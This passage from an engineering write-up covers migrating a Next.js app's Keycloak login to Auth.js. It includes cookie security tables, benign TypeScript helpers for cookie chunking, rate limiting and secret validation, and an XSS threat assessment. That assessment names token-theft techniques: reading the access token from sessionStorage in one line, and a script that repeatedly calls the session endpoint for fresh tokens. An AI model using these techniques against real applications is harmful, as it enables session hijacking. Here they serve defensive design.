In our migration, the encrypted session cookie containing the refresh token is httpOnly. This is what makes the refresh token completely unreachable to XSS — it is not in sessionStorage, not in a JS variable, and not readable from document.cookie. It only travels between the browser and the Next.js server as an automatic HTTP header that JavaScript never sees.
Cookie Security Properties
Auth.js configures these properties on the session cookie automatically:
| Property | Value | Purpose |
|---|---|---|
| HttpOnly | true | JS cannot read the cookie; refresh token invisible to XSS |
| Secure | true | Cookie only sent over HTTPS, which prevents interception on plain HTTP |
| SameSite | Lax | Cookie not sent on cross-site POST requests, which mitigates CSRF |
| Path | / (Auth.js default) | Cookie is sent with every request to the app, which is what lets middleware and auth() read the session |
| Encryption | AES (Auth.js internal) | Cookie payload encrypted at rest — even if somehow intercepted, contents are unreadable |
| Chunking | Automatic | Auth.js splits cookies >4KB into .0, .1, etc. — handles large Keycloak JWTs |
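To get a feel for what chunking means for a large Keycloak session, here is a simplified sketch of the idea. It is not the Auth.js implementation: the function names are invented and the chunk size is passed in by the caller, because the exact per-cookie budget Auth.js uses is an internal detail that should be checked against the version you run.

```typescript
interface CookieChunk {
  name: string;
  value: string;
}

// Splits a cookie value into name.0, name.1, ... when it exceeds maxChunkSize.
// The session cookie value is ASCII, so string length equals byte length.
function chunkCookieValue(name: string, value: string, maxChunkSize: number): CookieChunk[] {
  if (maxChunkSize <= 0) throw new RangeError("maxChunkSize must be positive");
  if (value.length <= maxChunkSize) return [{ name, value }];
  const chunks: CookieChunk[] = [];
  for (let offset = 0; offset < value.length; offset += maxChunkSize) {
    chunks.push({
      name: `${name}.${chunks.length}`,
      value: value.slice(offset, offset + maxChunkSize),
    });
  }
  return chunks;
}

// Numeric suffix after the last dot; an unchunked cookie sorts as 0.
function chunkIndex(cookieName: string): number {
  const suffix = cookieName.slice(cookieName.lastIndexOf(".") + 1);
  const parsed = Number.parseInt(suffix, 10);
  return Number.isNaN(parsed) ? 0 : parsed;
}

// Reassembles the value regardless of the order the cookies arrived in.
function joinCookieChunks(chunks: CookieChunk[]): string {
  return [...chunks]
    .sort((a, b) => chunkIndex(a.name) - chunkIndex(b.name))
    .map((chunk) => chunk.value)
    .join("");
}
```

Running chunkCookieValue against a real encrypted session value from staging is a quick way to see how many cookies a user with many roles and groups will carry on each request.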
What This Migration Does and Does Not Protect
A common question: does moving tokens server-side prevent all token theft?
No. As long as the browser needs an access token to call APIs, code running in that browser can potentially access it. This is a fundamental constraint, not a design flaw.
What changes is the attack surface, not the theoretical possibility:
| Token | Current (keycloak-js) | After migration (Auth.js) |
|---|---|---|
| Access token | sessionStorage.getItem("accessToken") — one line, silent | Must call fetch("/auth-api/auth/session") and read the response — noisier, more steps |
| Refresh token | Also in sessionStorage — same one-line theft | Completely unreachable — never leaves the server, never returned by any endpoint |
Honest XSS Assessment
An important nuance: the access token obtained via the session endpoint is not truly one-shot. Every call to GET /auth-api/auth/session triggers the server-side jwt callback, which automatically refreshes the access token if it is expired. The browser sends the httpOnly cookie along with the request — so the server refreshes on the caller’s behalf, even if that caller is a malicious script.
This means an XSS attacker can call fetch("/auth-api/auth/session") repeatedly and obtain continuously fresh access tokens for the entire lifetime of the refresh token (typically hours to days). The attacker does not need the refresh token directly — the browser’s automatic cookie attachment does the work.
What the hybrid pattern actually prevents vs. what it does not:
| Scenario | Current (keycloak-js) | After migration (hybrid) |
|---|---|---|
| Steal refresh token for persistent offline access | One-liner from sessionStorage | Impossible — refresh token never leaves server |
| Obtain fresh access tokens while XSS is active | Read from sessionStorage, silently | Call session endpoint, server auto-refreshes |
| Maintain access after XSS is cleaned up | Yes — stolen refresh token still works | No — attacker has no refresh token to replay |
| Exfiltrate tokens to external server | Both tokens easily copied | Access token only, and it expires in minutes |
The real security win: not that XSS during an attack is fully prevented (it is not, in the hybrid pattern), but that the blast radius after cleanup is dramatically smaller. Today, a stolen refresh token means the attacker keeps access until the token is manually revoked. After migration, once the XSS vulnerability is patched, the attacker’s access dies with the next token expiry.
To eliminate even the active-XSS exposure, the full BFF pattern (step 2) removes accessToken from the session response entirely. Rate-limiting the session endpoint is also a viable intermediate mitigation.
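A rate limit on the session endpoint can start out very simple. The sketch below is a fixed-window counter held in process memory; the class name and the idea of keying by a session or client identifier are assumptions, and in a multi-pod deployment each pod would count separately unless the counters move to a shared store.

```typescript
// Fixed-window limiter: at most `limit` calls per key in each window.
class FixedWindowLimiter {
  private readonly limit: number;
  private readonly windowMs: number;
  private readonly windows = new Map<string, { start: number; count: number }>();

  constructor(limit: number, windowMs: number) {
    this.limit = limit;
    this.windowMs = windowMs;
  }

  // Returns true if the call is allowed and records it.
  allow(key: string, now: number = Date.now()): boolean {
    const current = this.windows.get(key);
    if (!current || now - current.start >= this.windowMs) {
      // First call, or the previous window has ended: start a new one.
      this.windows.set(key, { start: now, count: 1 });
      return true;
    }
    if (current.count >= this.limit) return false;
    current.count += 1;
    return true;
  }
}
```

This does not stop an attacker from reading a token; it caps how often a script can ask for a fresh one, and a burst of rejected calls is a useful signal to alert on.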
Beyond This Migration: Full BFF Proxy
After the hybrid migration, the remaining exposure is the short-lived access token readable via useSession(). To eliminate even that, a full BFF proxy would route every API call through the Next.js server — the browser would hold only a session cookie, never an access token.
Our position: the hybrid migration is step 1 — it eliminates refresh token theft with manageable effort. Full BFF is a natural step 2 if the threat model demands it. The hybrid foundation carries over — only the Axios token source would be replaced by server-side proxy routes.
8. Considerations
If you are planning a similar migration, here are the areas that required the most careful thinking:
- Edge Runtime compatibility: Next.js middleware runs in Edge Runtime, which does not support all Node.js APIs. If your auth configuration imports modules that use fs, streams, or other Node.js-specific APIs (common with logging libraries), you will need a split configuration: a minimal Edge-safe config for middleware and the full config for route handlers. Auth.js v5 supports this pattern.
- Cookie size limits: Keycloak JWTs can be large, especially with many realm roles and group memberships. Browser cookie limits (typically 4KB per cookie) can be exceeded. Auth.js handles this with automatic cookie chunking, but you should measure your real token sizes before going to production.
- Multi-pod token refresh coordination: The in-process mutex only prevents races within a single Node.js process. In a Kubernetes environment with multiple pods, you need session affinity or a distributed locking mechanism. Start with sticky sessions and add Redis-based locking only if monitoring shows actual failures.
- Feature flag design for safe rollback: Running two auth systems in parallel requires a feature flag to toggle between them at runtime. Design this before writing any migration code; it is the foundation for safe, incremental deployment and rollback.
- trailingSlash configuration: If your Next.js config uses trailingSlash: true, verify that Auth.js callback URLs work correctly. The trailing slash rewrite can cause Keycloak redirect URI mismatches. Register both URL variants in Keycloak as a safety measure.
- Static root layout conflicts: If your root layout uses force-static, any Server Component that calls auth() (which reads cookies/headers) will fail at build time. Verify which route segments need to opt out with force-dynamic.
- Production secret management: Session encryption keys and Keycloak client secrets must be generated with cryptographic randomness, stored in a secrets manager (e.g., Vault, AWS Secrets Manager), and rotated on a schedule. Add startup validation that rejects placeholder values in production.
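The startup validation mentioned in the last item can be a small pure function called before the server begins accepting traffic. Everything specific here is an assumption for illustration: the variable names (AUTH_SECRET and AUTH_KEYCLOAK_SECRET follow Auth.js naming conventions), the placeholder pattern, and the 32-character minimum.

```typescript
// Values that commonly survive from .env.example files (illustrative list).
const PLACEHOLDER_PATTERN = /^(changeme|change-me|secret|placeholder|your-.*|x+)$/i;
const REQUIRED_SECRETS = ["AUTH_SECRET", "AUTH_KEYCLOAK_SECRET"];
const MIN_SECRET_LENGTH = 32; // assumed threshold, adjust to your policy

// Returns a list of problems; an empty list means the secrets look sane.
// Checks are skipped outside production so local setups stay convenient.
function validateAuthSecrets(env: Record<string, string | undefined>): string[] {
  const problems: string[] = [];
  if (env.NODE_ENV !== "production") return problems;
  for (const name of REQUIRED_SECRETS) {
    const value = env[name];
    if (!value) {
      problems.push(`${name} is missing`);
    } else if (PLACEHOLDER_PATTERN.test(value)) {
      problems.push(`${name} looks like a placeholder`);
    } else if (value.length < MIN_SECRET_LENGTH) {
      problems.push(`${name} is shorter than ${MIN_SECRET_LENGTH} characters`);
    }
  }
  return problems;
}
```

A caller would pass process.env and refuse to start when the returned list is non-empty, logging the variable names but never the values.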
Glossary
| Term | Definition |
|---|---|
| PKCE | Proof Key for Code Exchange — binds auth code to the session that requested it |
| Confidential client | OAuth client with a client_secret stored server-side (vs public client with no secret) |
| BFF | Backend-for-Frontend — the server-side layer that handles auth on behalf of the browser |
| Federated logout | Ending the session at both Next.js and Keycloak simultaneously |
| Mutex | Mutual exclusion — ensures only one token refresh runs at a time |
| httpOnly cookie | Browser cookie that JavaScript cannot read via document.cookie |
This blueprint was developed as part of a production migration. The hybrid pattern is live in our staging environment and progressing toward production. If you are considering the same migration, I hope this saves you some of the research time it cost us.